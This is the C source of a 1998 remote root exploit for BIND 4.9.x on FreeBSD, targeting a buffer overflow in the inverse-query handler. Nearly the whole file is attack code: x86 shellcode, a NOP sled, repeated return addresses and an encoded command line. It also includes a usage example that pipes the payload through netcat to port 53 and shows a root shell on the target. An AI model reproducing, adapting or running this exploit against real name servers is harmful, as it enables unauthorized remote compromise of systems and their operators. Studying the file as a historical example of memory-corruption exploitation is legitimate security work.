remote bind 4.9.x exploit Example for FreeBSD. bug in: bind/named/ns_req.c:req_inquery().
4acad7f7f93b04c0a7f0d62fa91d01af27211872b858473b8eb810848d404a39
/*
remote bind 4.9.x exploit Example for FreeBSD (do not use!.)
28-Apr-1998 by stran9er
credits: bof-test.c written solely by Joshua J. Drake (jdrake@pulsar.net)
bug in: bind/named/ns_req.c:req_inquery()
*/
/*
offsets: 4.9.6 min = 0 options fake-iquery
4.9.6-REL min = -100
8.1.1 min = 400 [ fake-iquery yes; ]
*/
/*
Usage example:
$ (./exploit 0 /bin/sh -c 'exec sh -i <&4 >&4 2>&4';cat) | nc localhost 53
Adress: 0xefbfd444 Offset: 0
sh: can't access tty; job control turned off
# whoami
root
#
*/
#define QUERY_LEN 0x600
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/nameser.h>
typedef struct {
unsigned short int r_class; /* class number */
unsigned short int r_type; /* type number */
unsigned long int r_ttl; /* time to live */
unsigned short int r_size; /* size of data area */
char r_data[QUERY_LEN]; /* pointer to data */
} rrecord;
char shellc[] = "\xEB\x4b\x5E\x33\xD2\x33\xC9\x33\xDB\x66\x8B\x04\x0E\x02"
"\xC4\x88\x04\x16\x41\x41\x42\x22\xC0\x75\xF0\x02\xE4\x74\x0E\x8D\x04\x16"
"\x89\x04\x1E\x43\x43\x43\x43\xEB\xE0\x90\x90\x33\xC0\x89\x04\x1E\x46\x88"
"\x46\x0E\x46\x46\x46\x89\x46\x06\xB0\x3B\x8D\x4E\x10\x8B\x5E\x10\x8B\xD1"
"\x8D\x76\x05\x52\x51\x53\x50\xFF\xE6\xE8\xB0\xFF\xFF\xFF\x6f\x21\x6f\x21"
"\x6f\x21\xdf\x21\x6f\x21\x6f\x21\x6f\x21\xdf\x21\xdf\x21\x8B\x0F\x8B\x0F"
"\x8B\x0F\xdf\x21\x8B\x0F\x02\x05\x8B\x0F\x6f\x21\x6f\x21\x6f\x21\xdf\x21";
char neshel1[] = "\x11\x11\x11\x11\x11\x11\x11\x11"; /* shellcode by */
char neshel2[] = "\x22\x22\x22\x22\x22\x22\xdf\x21"; /* stran9er 10'97 */
main(int argc, char **argv) {
HEADER *h;
rrecord *rr;
char db[sizeof(HEADER)+sizeof(rrecord)+2];
char *buf, *ptr;
unsigned char cat[]="no";
short int *buflen;
unsigned long stack = 0xefbfd444, offset;
int sh=1024,o,b,c,t;
if ( (argc<3) || (*argv[2]!='/')) {
printf ("usage %s offset /path/command [args ...] | netcat target 53\n",argv[0]);
exit(1);
}
offset=atoi(argv[1]);
stack+=offset;
fprintf(stderr,"\nAdress: 0x%x Offset: %d\n",stack, offset);
buf=db;
memset(buf, 0, sizeof(db));
buflen=(short int *)buf;
*buflen=htons(sizeof(db)-2);
h = (HEADER *)(buf+2);
h->id = rand() & 0xfff;
h->opcode = IQUERY;
h->ancount = htons(1);
rr=(rrecord *)((char *)h+sizeof(HEADER)+1);
rr->r_class= htons(C_IN);
rr->r_type = htons(T_A);
rr->r_ttl = htonl(31337);
rr->r_size = htons(QUERY_LEN+1);
ptr=rr->r_data+1;
memset(ptr,0x90,QUERY_LEN);
ptr[498]=0xeb; ptr[498+1]=21; /* damn: sprintf(dnbuf, "[%s]", inet_ntoa(data_inaddr((u_char *)data))); */
for(c=sh;c<=(QUERY_LEN-4);) {
if ((c+4) > (QUERY_LEN-4)) stack +=4;
ptr[c++] = stack & 0x000000ff;
ptr[c++] = (stack & 0x0000ff00) >> 8;
ptr[c++] = (stack & 0x00ff0000) >> 16;
ptr[c++] = (stack & 0xff000000) >> 24;
}
strcpy(ptr+sh,shellc);
for (b=2;b<argc;b++) strcat(ptr,neshel1);
strcat(ptr,neshel2);
for (b=2;b<argc;b++) {
for (c=0;c<strlen(argv[b]);c++) {
cat[0]=argv[b][c]-'Z';
cat[1]='Z';
if (!cat[0]) break;
for (t=0,o=-1;t!=o;) {
o=t;
if ((cat[0]!=0) && (cat[0]<=32)) { cat[0]++; cat[1]--; t++; }
if (cat[1]<=32) { cat[0]++; cat[1]--; t++; }
if (!cat[0]) {fprintf (stderr,"can't encode command line\n") ; exit(1);}
}
strcat(ptr,(char *)cat);
}
if ( b != (argc - 1) ) strcat (ptr,"\xf0\x10");
}
strcat(ptr,"\x80\x80");
ptr[strlen(ptr)]=9;
write(1,buf,sizeof(db));
}